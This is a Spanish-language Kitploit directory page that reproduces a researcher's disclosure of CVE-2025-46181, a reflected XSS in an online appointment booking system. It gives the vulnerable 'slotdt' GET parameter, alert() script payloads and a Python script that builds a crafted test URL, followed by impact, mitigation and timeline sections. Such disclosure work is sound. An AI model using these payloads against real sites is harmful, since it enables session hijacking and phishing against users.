Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-46181-XSS | Kitploit
Herramientas/GitHubGitHub/shemkumar/cve-2025-46181-xss
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubshemkumar/cve-2025-46181-xss

CVE-2025-46181-XSS

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-46181 - XSS reflejado en un sistema de reserva de citas en línea

CVE-ID: CVE-2025-46181
Descubierto por: Shemkumar P (shemkumar.github.io)
Tipo de vulnerabilidad: Cross-Site Scripting (XSS) reflejado
Severidad: Media
Estado: Divulgado, CVE asignado por MITRE


✨ Descripción

Existe una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en un sistema público de reserva de citas en línea (v1.0), específicamente en la página que gestiona la confirmación de citas. Un parámetro GET no sanea correctamente la entrada, lo que permite la inyección de JavaScript y la ejecución de código en el navegador de la víctima.


📍 Parámetro vulnerable

root@kitploit:~
GET /confirmapp.php?slotdt=<payload>

Carga útil de ejemplo (codificada):

root@kitploit:~
<script>alert("XSS")</script>

💥 Prueba de concepto (PoC)

root@kitploit:~
<script>alert("You have been hijacked")</script>

🚫 Enlace en vivo omitido por razones éticas. Esta vulnerabilidad fue probada en un entorno controlado.


⚙️ Script de PoC en Python

root@kitploit:~
import requests
from urllib.parse import quote

base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'

params = {
    'fullname': 'test',
    'mobile': '9999999999',
    'emailid': '[email protected]',
    'slotdt': payload,
    'slottime': '11:00:00',
    'doctorid': '2'
}

encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")

🛡️ Impacto

  • Ejecución arbitraria de JavaScript
  • Posible secuestro de sesión
  • Clickjacking o redirección de phishing
  • Ataques dirigidos mediante enlaces manipulados

🧪 Mitigación

La aplicación debería:

  • Escapar las entradas del usuario usando htmlspecialchars() en PHP
  • Utilizar una Política de Seguridad del Contenido (CSP)
  • Sanear los datos del usuario tanto en el lado del cliente como en el del servidor

📜 Cronología

  • Descubierto: mayo de 2025
  • CVE asignado por MITRE: junio de 2025
  • Publicación: junio de 2025

🧑‍💻 Autor

Shemkumar P
🕸️ shemkumar.github.io
🔐 Investigador de ciberseguridad | Entusiasta de CTF | Reportero de CVE


⚠️ Esta publicación es solo para uso educativo y defensivo. Probar o explotar vulnerabilidades en sistemas que no posees o para los que no tienes permiso explícito es ilegal y poco ético.

Descargar herramienta